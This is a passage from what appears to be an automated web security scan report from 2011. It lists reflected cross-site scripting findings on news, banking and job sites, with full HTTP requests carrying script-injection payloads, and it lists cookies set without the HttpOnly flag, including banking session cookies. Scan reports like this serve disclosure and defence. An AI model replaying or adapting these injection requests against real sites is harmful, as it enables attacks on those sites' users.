Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/can_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: is_returning=1; __qca=P0-52444882-1317129796944; _chartbeat2=rdx0wt5nps41a8fh.1315773978848; __utma=1.1459067327.1315773955.1315773955.1317129670.2; __utmb=1.3.10.1317129670; __utmc=1; __utmz=1.1315773955.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); doclix_anchor_pageview=3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 720
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:23:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/rw/nypost/2011/09/27/news/web_photos/27n.006.dsk.C--300x300.jpg40a67<script>alert(1)</script>a1bb405658e</p>
...[SNIP]...

2.279. http://www.rbcroyalbank.com/products/deposits/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rbcroyalbank.com
Path:   /products/deposits/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d359f"><script>alert(1)</script>707e952452d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/deposits/index.html?tab=student_tab&d359f"><script>alert(1)</script>707e952452d=1 HTTP/1.1
Host: www.rbcroyalbank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.rbcroyalbank.com/personal.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=50.23.123.106-914063840.30178585:lv=1317130069753:ss=1317130069753; stylesheetsetting=null; lastviewed=personal

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:28:19 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 27 Sep 2011 13:28:19 GMT
Content-Type: text/html
Content-Length: 107797

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<hea
...[SNIP]...
<a href="/products/deposits/index.html?tab=student_tab&d359f"><script>alert(1)</script>707e952452d=1#skipleftnav">
...[SNIP]...

2.280. http://www.rbcroyalbank.com/products/deposits/index.html [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rbcroyalbank.com
Path:   /products/deposits/index.html

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e353f"><script>alert(1)</script>1318b24b36e was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/deposits/index.html?tab=student_tabe353f"><script>alert(1)</script>1318b24b36e HTTP/1.1
Host: www.rbcroyalbank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.rbcroyalbank.com/personal.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=50.23.123.106-914063840.30178585:lv=1317130069753:ss=1317130069753; stylesheetsetting=null; lastviewed=personal

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:28:17 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 27 Sep 2011 13:28:17 GMT
Content-Type: text/html
Content-Length: 107759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<hea
...[SNIP]...
<a href="/products/deposits/index.html?tab=student_tabe353f"><script>alert(1)</script>1318b24b36e#skipleftnav">
...[SNIP]...

2.281. http://www.rbcroyalbank.com/products/deposits/youth-student-banking.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rbcroyalbank.com
Path:   /products/deposits/youth-student-banking.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6148b"><script>alert(1)</script>efa576529ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/deposits/youth-student-banking.html?6148b"><script>alert(1)</script>efa576529ec=1 HTTP/1.1
Host: www.rbcroyalbank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.rbcroyalbank.com/products/deposits/index.html?tab=student_tab&d359f%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E707e952452d=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastviewed=personal; accounts_homepage_managing_your_card_tab_eng=0; accounts_homepage_customer_service_tab_eng=0; WT_FPC=id=50.23.123.106-914063840.30178585:lv=1317130178378:ss=1317130069753; stylesheetsetting=null; accounts_homepage_maintab_eng=2

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:33:59 GMT
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Tue, 27 Sep 2011 13:33:59 GMT
Content-Type: text/html
Content-Length: 29383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href="/products/deposits/youth-student-banking.html?6148b"><script>alert(1)</script>efa576529ec=1#skipleftnav">
...[SNIP]...

2.282. http://www.simplyhired.com/a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5 [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.simplyhired.com
Path:   /a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b194"style%3d"x%3aexpression(alert(1))"a8a75d08fc3 was submitted in the partner parameter. This input was echoed as 2b194"style="x:expression(alert(1))"a8a75d08fc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5?partner=computerworld2b194"style%3d"x%3aexpression(alert(1))"a8a75d08fc3&stylesheet=http%3A%2F%2Fwww.computerworld.com%2Fresources%2Fsimply-hired-article.css%3F20100409&color_title=%231752A3&color_location=%239c9c9c&color_company=%23656565&header= HTTP/1.1
Host: www.simplyhired.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: __utma=270297075.68763.1312579735.1316477965.1316648061.3; __utmz=270297075.1316648061.3.3.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; shua=uafbp%3D8%2Cuaversion%3D2%2Cuajobssearched%3D1316629985%2Cuaexp%3D1; __qca=P0-87527774-1316648061030; shabts=tg141; shup=fvt%3D4e7a2df4

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Sep 2011 20:38:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 8317

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html id="html" dir="ltr" xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<body id="sh_job_widget" class="computerworld2b194"style="x:expression(alert(1))"a8a75d08fc3">
...[SNIP]...

2.283. http://www.simplyhired.com/a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5 [stylesheet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.simplyhired.com
Path:   /a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5

Issue detail

The value of the stylesheet request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313f8"style%3d"x%3aexpression(alert(1))"9bec64234cd was submitted in the stylesheet parameter. This input was echoed as 313f8"style="x:expression(alert(1))"9bec64234cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /a/job-widget/list/q-onet%3A(15-1*)%20OR%20onet%3A(17-2*)%20OR%20onet%3A(11-3*)%20OR%20technology%20OR%20%C2%93data%20architect%C2%94%20OR%20%C2%93software%20engineer%C2%94%20OR%20%C2%93computer%20technician%C2%94%20OR%20%C2%93cto%C2%94/l-%20/ws-5?partner=computerworld&stylesheet=http%3A%2F%2Fwww.computerworld.com%2Fresources%2Fsimply-hired-article.css%3F20100409313f8"style%3d"x%3aexpression(alert(1))"9bec64234cd&color_title=%231752A3&color_location=%239c9c9c&color_company=%23656565&header= HTTP/1.1
Host: www.simplyhired.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: __utma=270297075.68763.1312579735.1316477965.1316648061.3; __utmz=270297075.1316648061.3.3.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; shua=uafbp%3D8%2Cuaversion%3D2%2Cuajobssearched%3D1316629985%2Cuaexp%3D1; __qca=P0-87527774-1316648061030; shabts=tg141; shup=fvt%3D4e7a2df4

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Sep 2011 20:38:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Length: 7516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html id="html" dir="ltr" xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.computerworld.com/resources/simply-hired-article.css?20100409313f8"style="x:expression(alert(1))"9bec64234cd" />
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 27 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. https://easywebsoc.tdcanadatrust.com/servlet/ca.tdbank.banking.servlet.DefaultServlet  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://easywebsoc.tdcanadatrust.com
Path:   /servlet/ca.tdbank.banking.servlet.DefaultServlet

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /servlet/ca.tdbank.banking.servlet.DefaultServlet?referer=main&FPL=CORE HTTP/1.1
Host: easywebsoc.tdcanadatrust.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrandReferrer=http%3A//www.tdcanadatrust.com/products-services/banking/index-banking.jsp; mbox=session#1317130064411-279159#1317132430|check#true#1317130630; s_pers=%20s_vnum_d%3D1317186000473%2526vn%253D1%7C1317186000473%3B%20s_vnum_w%3D1317531600477%2526vn%253D1%7C1317531600477%3B%20s_vnum_m%3D1317445200480%2526vn%253D1%7C1317445200480%3B%20s_cmchan%3D%255B%255B'Natural%252520Search'%252C'1317130067485'%255D%252C%255B'Referrers'%252C'1317130108011'%255D%255D%7C1474982908011%3B%20sinvisit_d%3Dtrue%7C1317132370580%3B%20sinvisit_w%3Dtrue%7C1317132370587%3B%20sinvisit_m%3Dtrue%7C1317132370590%3B%20s_nr%3D1317130570597%7C1319722570597%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3Dundefinedwww.tdcanadatrust.comwww.tdcanadatrust.com%3B%20s_sq%3D%3B; com.td.WAWID=easyweb.tdcanadatrust.com; sitecontext=48790aaa-b1a4-4884-9226-8425d8c74fcb

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:36:08 GMT
Server: IBM_HTTP_Server
Content-Length: 493
Set-Cookie: JSESSIONID=0000z0R1gAY_3yuk1NfI5hS46Me:15aml0faa; Path=/; Secure
Set-Cookie: JSESSIONID=0000gxQROYP7aPXFKjRd4cdL2zh:15aml0faa; Path=/; Secure
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CUR DEV PSA PSD CONo TELo ADM TAI OUR LEG PHY ONL UNI FIN CNT PRE GOV PUR NAV INT COM STA"
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US


<html>
<head>
   <script language="JavaScript">
       function sendToLogin(){        
           document.cipRedirect.submit();            
       }
   </script>
</head>
<body onload="sendToLogin()">
<form name="cipRedirect
...[SNIP]...

3.2. http://as.vs4entertainment.com/ERA/ResourceHandler.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.vs4entertainment.com
Path:   /ERA/ResourceHandler.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ERA/ResourceHandler.ashx?cdbf75a0-c922-4a4c-a950-da8fc8648863;Capture_1.jpg HTTP/1.1
Host: as.vs4entertainment.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ERA_C1=7a20bf9b-ca70-4e77-a805-0e94cbba9829; ERA_C2=0461e5da-f74e-42ca-9249-0860b2dee4e4

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=31536000
Content-Length: 1646
Content-Type: image/jpeg
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Disposition: inline; filename="Capture_1.jpg"
Set-Cookie: ERA_C2=0461e5da-f74e-42ca-9249-0860b2dee4e4; expires=Tue, 27-Sep-2011 13:53:01 GMT; path=/
Date: Tue, 27 Sep 2011 13:23:00 GMT

......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222......P.P.."..............................
...[SNIP]...

3.3. http://as.vs4entertainment.com/ERALinks/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://as.vs4entertainment.com
Path:   /ERALinks/Default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ERALinks/Default.aspx?ContentId=&numrequests=1&req1=SSMicrosites||4|&SortBy:Rank&Referrer=http%3A%2F%2Fwww.nypost.com%2Fp%2Fnews%2Flocal%2Fli_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN&PubID=nypost&BlockID=%2Fnews-story-300x225&Vis=F&OutputType=javascript&elementid=ERA_AD_BLOCK HTTP/1.1
Host: as.vs4entertainment.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nypost.com/p/news/local/li_tech_mogul_in_suicide_shocker_gvGZBRZQgfCvk4GvUdf7GN
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 27 Sep 2011 13:22:53 GMT
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ERA_C2=0461e5da-f74e-42ca-9249-0860b2dee4e4; expires=Tue, 27-Sep-2011 13:52:53 GMT; path=/
Vary: Accept-Encoding
Content-Length: 4447

ERA_RC.resource.getContent({"value":"<div class=\"vsw-ad-rc\"><div class=\"vsw-ad-header\"><a href=\"http://www.verticalsearchworks.com/\" target=\"_blank\"><span class=\"vsw-text-red\">VS</span>W Fea
...[SNIP]...

3.4. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=1034655852&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.computerworld.com%252Fs%252Farticle%252F9220295%252FMySQL.com_hacked_to_serve_malware%253FtaxonomyId%253D17%26jsref%3D%26rnd%3D1317069532132&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.computerworld.com%2Fs%2Farticle%2F9220295%2FMySQL.com_hacked_to_serve_malware%3FtaxonomyId%3D17&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.computerworld.com%2Fs%2Farticle%2F9220295%2FMySQL.com_hacked_to_serve_malware%3FtaxonomyId%3D17&jsref=&rnd=1317069532132
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 26 Sep 2011 20:38:37 GMT
Connection: close
Set-Cookie: UID=2695e1-80.67.74.150-1312230894; expires=Wed, 25-Sep-2013 20:38:37 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate


3.5. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=1&c2=7395021&c3=&c4=&c5=01&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 27 Sep 2011 13:21:40 GMT
Connection: close
Set-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 26-Sep-2013 13:21:40 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

3.6. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035308&d.c=gif&d.o=computerworldcom&d.x=230482351&d.t=page&d.u=http%3A%2F%2Fwww.computerworld.com%2Fs%2Farticle%2F9220295%2FMySQL.com_hacked_to_serve_malware%3FtaxonomyId%3D17 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: UID=2695e1-80.67.74.150-1312230894

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 26 Sep 2011 20:38:28 GMT
Connection: close
Set-Cookie: UID=2695e1-80.67.74.150-1312230894; expires=Wed, 25-Sep-2013 20:38:28 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate

GIF89a.............!.......,...........D..;

3.7. http://bid.openx.net/json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /json?c=OXM_79399726143&pid=9d40ff00-718e-d8e2-b18f-54978727399d&s=300x250&f=1.41&url=http%3A%2F%2Ftag.admeld.com%2Fad%2Fiframe%2F14%2Fnypost%2F300x250%2Frtb_tier1%3Ft%3D1317129678689%26tz%3D300%26m%3D0%26hu%3D%26ht%3Djs%26hp%3D0%26fo%3D%26url%3Dhttp%253A%252F%252Fwww.nypost.com%252F%26refer%3D&cid=oxpv1%3A34-632-1929-2158-6112&hrid=1cc78fdfdf489a12b2fcb8246e0a1cd8-1317129663 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6112&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1316390688; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1317129667; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_79399726143({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAGXQMU7DMBgF4Be3Sd24U
...[SNIP]...

3.8. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

